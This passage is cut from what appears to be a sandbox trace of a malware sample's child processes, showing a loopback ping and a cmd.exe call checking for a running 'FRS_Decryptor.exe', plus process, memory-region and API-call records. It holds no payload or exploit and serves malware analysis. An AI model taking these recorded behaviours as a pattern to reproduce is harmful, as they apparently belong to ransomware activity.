lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0148.722] _fileno (_File=0x76ea4c28) returned 1 [0148.722] _write (in: _FileHandle=1, _Buf=0x7e8068*, _MaxCharCount=0x5c | out: _Buf=0x7e8068*) returned 92 [0148.722] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0148.722] _fileno (_File=0x76ea4c28) returned 1 [0148.722] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0148.722] LocalFree (hMem=0x7e8068) returned 0x0 [0148.722] LocalFree (hMem=0x7e7fa0) returned 0x0 [0148.722] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x5ded68, nSize=0x0, Arguments=0x5ded64 | out: lpBuffer="羠~]ᨧ\x94䰨盪❓") returned 0x61 [0148.722] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0148.722] _fileno (_File=0x76ea4c28) returned 1 [0148.722] _get_osfhandle (_FileHandle=1) returned 0x28 [0148.723] GetFileType (hFile=0x28) returned 0x2 [0148.723] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ded2c | out: lpMode=0x5ded2c) returned 0 [0148.723] GetLastError () returned 0x6 [0148.723] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5dec90, nSize=0x50 | out: lpBuffer="]❓") returned 0x0 [0148.723] _fileno (_File=0x76ea4c28) returned 1 [0148.723] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0148.723] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0148.723] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x7e8070 [0148.723] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x7e8070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0148.723] _fileno (_File=0x76ea4c28) returned 1 [0148.723] _write (in: _FileHandle=1, _Buf=0x7e8070*, _MaxCharCount=0x61 | out: _Buf=0x7e8070*) returned 97 [0148.723] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0148.723] _fileno (_File=0x76ea4c28) returned 1 [0148.723] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0148.723] LocalFree (hMem=0x7e8070) returned 0x0 [0148.723] LocalFree (hMem=0x7e7fa0) returned 0x0 [0148.723] IcmpCloseHandle (IcmpHandle=0x7d6a30) returned 1 [0148.723] LocalFree (hMem=0x7dc3e0) returned 0x0 [0148.723] LocalFree (hMem=0x7e5270) returned 0x0 [0148.723] WSACleanup () returned 0 [0148.724] exit (_Code=0) Thread: id = 456 os_tid = 0x4c0 Thread: id = 457 os_tid = 0x604 Process: id = "167" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5d369000" os_pid = "0x21c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8526 start_va = 0x930000 end_va = 0x94ffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 8527 start_va = 0x950000 end_va = 0x951fff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 8528 start_va = 0x960000 end_va = 0x96efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 8529 start_va = 0x970000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 8530 start_va = 0x9b0000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 8531 start_va = 0xab0000 end_va = 0xab3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 8532 start_va = 0xac0000 end_va = 0xac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 8533 start_va = 0xad0000 end_va = 0xad1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 8534 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8535 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8536 start_va = 0x7eee0000 end_va = 0x7ef02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eee0000" filename = "" Region: id = 8537 start_va = 0x7ef04000 end_va = 0x7ef04fff entry_point = 0x0 region_type = private name = "private_0x000000007ef04000" filename = "" Region: id = 8538 start_va = 0x7ef0c000 end_va = 0x7ef0efff entry_point = 0x0 region_type = private name = "private_0x000000007ef0c000" filename = "" Region: id = 8539 start_va = 0x7ef0f000 end_va = 0x7ef0ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef0f000" filename = "" Region: id = 8540 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8541 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8542 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8543 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 8544 start_va = 0xb60000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 8545 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8546 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8547 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8548 start_va = 0x930000 end_va = 0x93ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 8549 start_va = 0xae0000 end_va = 0xb5dfff entry_point = 0xae0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8550 start_va = 0xbe0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 8551 start_va = 0xe90000 end_va = 0xe9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 8552 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8553 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8554 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8555 start_va = 0x7ede0000 end_va = 0x7eedffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ede0000" filename = "" Region: id = 8556 start_va = 0x940000 end_va = 0x943fff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Thread: id = 458 os_tid = 0xaa8 [0148.757] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0148.757] __set_app_type (_Type=0x1) [0148.757] __p__fmode () returned 0x76ea1768 [0148.757] __p__commode () returned 0x76ea176c [0148.757] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0148.757] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0148.757] GetCurrentThreadId () returned 0xaa8 [0148.757] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaa8) returned 0x34 [0148.758] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0148.758] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0148.758] SetThreadUILanguage (LangId=0x0) returned 0x409 [0148.760] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0148.760] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xaaf7ec | out: phkResult=0xaaf7ec*=0x0) returned 0x2 [0148.760] VirtualQuery (in: lpAddress=0xaaf7fb, lpBuffer=0xaaf794, dwLength=0x1c | out: lpBuffer=0xaaf794*(BaseAddress=0xaaf000, AllocationBase=0x9b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.760] VirtualQuery (in: lpAddress=0x9b0000, lpBuffer=0xaaf794, dwLength=0x1c | out: lpBuffer=0xaaf794*(BaseAddress=0x9b0000, AllocationBase=0x9b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0148.760] VirtualQuery (in: lpAddress=0x9b1000, lpBuffer=0xaaf794, dwLength=0x1c | out: lpBuffer=0xaaf794*(BaseAddress=0x9b1000, AllocationBase=0x9b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0148.760] VirtualQuery (in: lpAddress=0x9b3000, lpBuffer=0xaaf794, dwLength=0x1c | out: lpBuffer=0xaaf794*(BaseAddress=0x9b3000, AllocationBase=0x9b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.760] VirtualQuery (in: lpAddress=0xab0000, lpBuffer=0xaaf794, dwLength=0x1c | out: lpBuffer=0xaaf794*(BaseAddress=0xab0000, AllocationBase=0xab0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0148.760] GetConsoleOutputCP () returned 0x1b5 [0148.760] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0148.761] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0148.761] _get_osfhandle (_FileHandle=1) returned 0x154 [0148.761] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0148.761] _get_osfhandle (_FileHandle=1) returned 0x154 [0148.761] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0148.761] _get_osfhandle (_FileHandle=0) returned 0x24 [0148.761] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0148.761] GetEnvironmentStringsW () returned 0xbe40c0* [0148.761] FreeEnvironmentStringsA (penv="=") returned 1 [0148.761] GetEnvironmentStringsW () returned 0xbe40c0* [0148.761] FreeEnvironmentStringsA (penv="=") returned 1 [0148.761] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xaae73c | out: phkResult=0xaae73c*=0x44) returned 0x0 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x0, lpData=0xaae748*=0xb2, lpcbData=0xaae740*=0x1000) returned 0x2 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x4, lpData=0xaae748*=0x1, lpcbData=0xaae740*=0x4) returned 0x0 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x0, lpData=0xaae748*=0x1, lpcbData=0xaae740*=0x1000) returned 0x2 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x4, lpData=0xaae748*=0x0, lpcbData=0xaae740*=0x4) returned 0x0 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x4, lpData=0xaae748*=0x40, lpcbData=0xaae740*=0x4) returned 0x0 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x4, lpData=0xaae748*=0x40, lpcbData=0xaae740*=0x4) returned 0x0 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x0, lpData=0xaae748*=0x40, lpcbData=0xaae740*=0x1000) returned 0x2 [0148.762] RegCloseKey (hKey=0x44) returned 0x0 [0148.762] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xaae73c | out: phkResult=0xaae73c*=0x44) returned 0x0 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x0, lpData=0xaae748*=0x40, lpcbData=0xaae740*=0x1000) returned 0x2 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x4, lpData=0xaae748*=0x1, lpcbData=0xaae740*=0x4) returned 0x0 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x0, lpData=0xaae748*=0x1, lpcbData=0xaae740*=0x1000) returned 0x2 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x4, lpData=0xaae748*=0x0, lpcbData=0xaae740*=0x4) returned 0x0 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x4, lpData=0xaae748*=0x9, lpcbData=0xaae740*=0x4) returned 0x0 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x4, lpData=0xaae748*=0x9, lpcbData=0xaae740*=0x4) returned 0x0 [0148.762] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xaae744, lpData=0xaae748, lpcbData=0xaae740*=0x1000 | out: lpType=0xaae744*=0x0, lpData=0xaae748*=0x9, lpcbData=0xaae740*=0x1000) returned 0x2 [0148.762] RegCloseKey (hKey=0x44) returned 0x0 [0148.762] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa500bf [0148.762] srand (_Seed=0x5aa500bf) [0148.762] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0148.762] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0148.762] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0148.762] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xbe40c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0148.763] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.763] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.763] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0148.763] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.763] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0148.763] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0148.763] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0148.763] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0148.763] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0148.763] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0148.763] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0148.763] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0148.763] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0148.763] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xaaf51c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0148.763] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xaaf51c, lpFilePart=0xaaf518 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xaaf518*="Desktop") returned 0x1c [0148.763] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0148.763] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xaaf298 | out: lpFindFileData=0xaaf298) returned 0xbe42d8 [0148.763] FindClose (in: hFindFile=0xbe42d8 | out: hFindFile=0xbe42d8) returned 1 [0148.764] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xaaf298 | out: lpFindFileData=0xaaf298) returned 0xbe42d8 [0148.764] FindClose (in: hFindFile=0xbe42d8 | out: hFindFile=0xbe42d8) returned 1 [0148.764] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0148.764] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xaaf298 | out: lpFindFileData=0xaaf298) returned 0xbe42d8 [0148.764] FindClose (in: hFindFile=0xbe42d8 | out: hFindFile=0xbe42d8) returned 1 [0148.764] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0148.764] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0148.764] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0148.764] GetEnvironmentStringsW () returned 0xbe6190* [0148.764] FreeEnvironmentStringsA (penv="=") returned 1 [0148.764] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0148.765] GetConsoleOutputCP () returned 0x1b5 [0148.765] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0148.765] GetUserDefaultLCID () returned 0x409 [0148.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0148.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xaaf648, cchData=128 | out: lpLCData="0") returned 2 [0148.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xaaf648, cchData=128 | out: lpLCData="0") returned 2 [0148.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xaaf648, cchData=128 | out: lpLCData="1") returned 2 [0148.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0148.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0148.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0148.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0148.766] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0148.766] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0148.766] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0148.766] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0148.766] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0148.766] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0148.766] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0148.767] GetConsoleTitleW (in: lpConsoleTitle=0xbe4e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0148.767] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0148.767] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0148.767] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0148.767] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0148.768] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0148.768] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0148.768] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0148.768] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0148.768] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0148.768] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0148.768] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0148.769] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0148.769] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0148.769] _wcsicmp (_String1="IF", _String2="find") returned 3 [0148.769] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0148.769] _wcsicmp (_String1="REM", _String2="find") returned 12 [0148.769] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0148.770] _pipe (_PtHandles=0xbe51f0, _PipeSize=0x0, _TextMode=32768)